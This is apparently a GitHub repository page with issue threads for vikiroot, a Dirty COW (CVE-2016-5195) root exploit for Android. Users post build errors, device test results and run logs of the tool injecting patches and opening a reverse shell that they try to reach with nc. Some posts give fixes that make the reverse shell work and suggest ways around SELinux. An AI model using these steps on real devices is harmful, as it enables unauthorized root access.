hyln9 / vikiroot
CVE-2016-5195 (Dirty COW) PoC for Android 6.0.1 Marshmallow
License: GNU General Public License v3.0
It just sends strings between terminals.
How can I use nc?
As the title says: can 4.x and 5.x be supported?
jni/exploit.c:43:21: fatal error: payload.h: No such file or directory
#include "payload.h"
After downloading the repository and running make all, I get the output:
exploit.o: In function `ptrace_thread':
exploit.c:(.text+0x160): undefined reference to `stderr'
exploit.c:(.text+0x164): undefined reference to `stderr'
exploit.c:(.text+0x1a4): undefined reference to `stderr'
exploit.c:(.text+0x1a8): undefined reference to `stderr'
exploit.c:(.text+0x24c): undefined reference to `stderr'
exploit.o:exploit.c:(.text+0x250): more undefined references to `stderr' follow
collect2: error: ld returned 1 exit status
Makefile:13: recipe for target 'exploit' failed
make: *** [exploit] Error 1
I ran the make command just as I downloaded it. I only had to change the Makefile in order to add absolute paths to the NDK binaries, as they weren't in my PATH.
Probably the fault of the Android NDK, but I cannot get VIKIROOT working at all...
Thanks for your PoC, @hyln9, it's interesting!
When I execute the PoC on my phone, I get the information as follows:
shell@shamu:/data/local/tmp $ ./exploit 1234
Reverse shell target: 127.0.0.1:1234
Exploit process starts.
Inject: patch 1/2
Inject: patch 2/2
Please wake up you phone now.
Waiting for reverse connect shell.
But now I don't know how to get the reverse shell, and I also want to know how to connect to the shell with nc. Can you tell me about that? Thanks!
What exactly does "payload.s" do? Is this "payload.h", am I right? How do I compile this? Help me please.
Sir,
I am trying to build your code and it gives me an error like this:
"aarch64-linux-android-objcopy : payload.o:Invalid bfd target"
Is there anything I need to install before starting compilation?
Thanks
Compiled the latest source code; it builds fine yet doesn't work (ZTE Blade Blitz x64). Set permissions 777 and executed ./exploit, but nothing happens.
Also happy to test on Nougat.
As described in the Bugs section here, some versions of libc have a bug where getpid() in a clone()d thread will return the parent PID rather than the child. (That page says CLONE_VM prevents it, but guess what, it happened anyway!)
Really lazy fix is:
#include <sys/syscall.h>
#define getpid() syscall(SYS_getpid)
After that, the reverse shell works.
D:\Program Files (x86)\Android\android-sdk\platform-tools>adb shell /data/local/tmp/exploit
/system/bin/sh: /data/local/tmp/exploit: can't execute: Permission denied
D:\Program Files (x86)\Android\android-sdk\platform-tools>adb shell sh /data/local/tmp/exploit
/data/local/tmp/exploit[1]: syntax error: '(' unexpected
D:\Program Files (x86)\Android\android-sdk\platform-tools>
I downloaded the code, and when launching make I get this:
/opt/android-ndk-r15c-linux-x86_64//toolchains/aarch64-linux-android-4.9/prebuilt/linux-x86_64/bin/aarch64-linux-android-as -o payload.o payload.s
/opt/android-ndk-r15c-linux-x86_64//toolchains/aarch64-linux-android-4.9/prebuilt/linux-x86_64/bin/aarch64-linux-android-objcopy -O binary payload.o payload
xxd -i payload payload.h
/opt/android-ndk-r15c-linux-x86_64/ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=x86_64 APP_PLATFORM=android-23
make[1]: Entering directory /root/VIKIROOT
[x86_64] Compile : vikiroot <= exploit.c
./exploit.c:90:27: warning: duplicate 'const' declaration specifier [-Wduplicate-decl-specifier]
static const struct entry const entry_db[] = {
                          ^
1 warning generated.
[x86_64] Executable : vikiroot
[x86_64] Install : vikiroot => libs/x86_64/vikiroot
make[1]: Leaving directory /root/VIKIROOT
I've tried to do it manually: push the executable onto the device, do the chmod and launch the exploit, and I receive this again:
Reverse shell target: 127.0.0.1:1337
Internal error: insufficient place for payload.
What could have happened?
I'm using the LS991 (LG G4 US-Sprint variant) on MM. On localhost, I can at least get it to run, and wait for a remote shell. Using Termux on the device and nc to try to connect to the shell, I get nothing. Specifying an ip in my local subnet (192.168.254.x), to which the device is connected via wifi, the device completely reboots.
What am I doing wrong, or is this by design unable to function this way?
I ran the exploit on a Nexus 6P with Android 7.1.1, but it is stuck on
"Waiting for reverse connect shell"
I tried it on a Samsung Galaxy S7 with N (7.0). It looks like nothing happened.
I tested the PoC on Android 6.0.1 and it succeeded, but on Android 6.0 it failed?
Have you tested it on Android 6.0?
On LG G4 with Android 6.0, the exploit works (code is running under init process), but fails to connect the shell due to selinux (connect() returns -EACCES). I've been toying with other methods (exec a shell script, open /dev/pts/n) but so far nothing. (I might be doing the /dev/pts part wrong?)
timwr's method (replacing run-as) does spawn a shell, but in a more limited context. Ideally I want a shell in init context, or some other that has more access.
Any other ideas to get around selinux blocking sockets?
I downloaded your PoC and compiled it with the NDK, but when I execute it on the phone it fails as follows:
Reverse shell target: 127.0.0.1:1111
Exploit process starts.
Inject: patch 1/2
[2] + Stopped (signal) ./exploit 1111
My Android.mk's content is:
LOCAL_MODULE := exploit
LOCAL_CFLAGS := -Os -fPIE -Wall
LOCAL_SRC_FILES := exploit.c
LOCAL_LDFLAGS := -pthread -s -pie -Wall
Could you tell me why? Thanks.
I compiled using aarch64-linux-gnu-gcc for my Android, but afterwards, when I try to execute it on Android, it won't work.
Getting error: No such file or directory
Is there a compiled version available? Could you leave a contact method?
Most armv7a (non-64bit) devices do not have VDSO enabled. Any suggestions on what might be the other places to inject?
>>> Reverse shell target: 127.0.0.1:4333
>>> Exploit process starts.
>>> Inject: patch 1/2
>>> Inject: patch 2/2
>>> Please wake up you phone now.
>>> Waiting for reverse connect shell.
>>> Enjoy!
====================TERMINAL====================
====================TERMINAL====================
>>> Restore process starts.
>>> Remove: patch 2/2
>>> Remove: patch 1/2
>>> Removing .x file.
In the case of a write remainder: all the data you have is in the 'src' array already. Just correct both pointers and write the whole word.
Thanks for your PoC!
I tested it on my phone (Huawei P9, Android 6.0).
But it does nothing. Did you test it on a Huawei phone? Does it use vdso?
When I try your root method, I can get to the terminal on 7.0 Nougat using Termux, but root has not been achieved.
whoami
u0_a211
Also, when I run certain programs (such as mount), I get this error on the phone:
CANNOT LINK EXECUTABLE "/system/bin/mount": cannot locate symbol "OpenSSL_add_all_algorithms" referenced by "/system/lib64/libselinux.so"...
Is this a problem with the program, or that I'm on 7.0 (I'm running this on an AT&T S7)?
Step 1:
I use wireless adb to connect to the device
adb connect 192.168.11.128
$ ./exploit 5678
Reverse shell target: 127.0.0.1:9999
Exploit process starts.
Inject: patch 1/2
Inject: patch 2/2
Please wake up you phone now.
Waiting for reverse connect shell.
Enjoy!
====================TERMINAL====================
host::features=cmd,stat_v2,shell_v2
Step 2:
adb connect 192.168.11.128:9999
adb shell error: device offline
Try to reconnect:
adb connect 192.168.11.128:9999 already connected to 192.168.11.128:9999
My device is a Samsung S7 and the API is 7.0. I want a shell. Please let me know your Facebook or please contact me. My email is [email protected]
Here is my problem.
Android adb (192.168.17.12) || Linux shell (192.168.17.39)
./exploit 2222
Reverse shell target: 127.0.0.1:2222
Exploit process starts.
Inject: patch 1/2
Inject: patch 2/2
Please wake up you phone now.
Waiting for reverse connect shell.
|| nc 192.168.17.12 2222
Enjoy!
======TERMINAL=====
|| asjdkasjkd
asjdkasjkd
||123
123
||ls <- command but it just send to string..
ls
======TERMINAL=====
Restore process starts.
Remove: patch 2/2
Remove: patch 1/2
Removing .x file.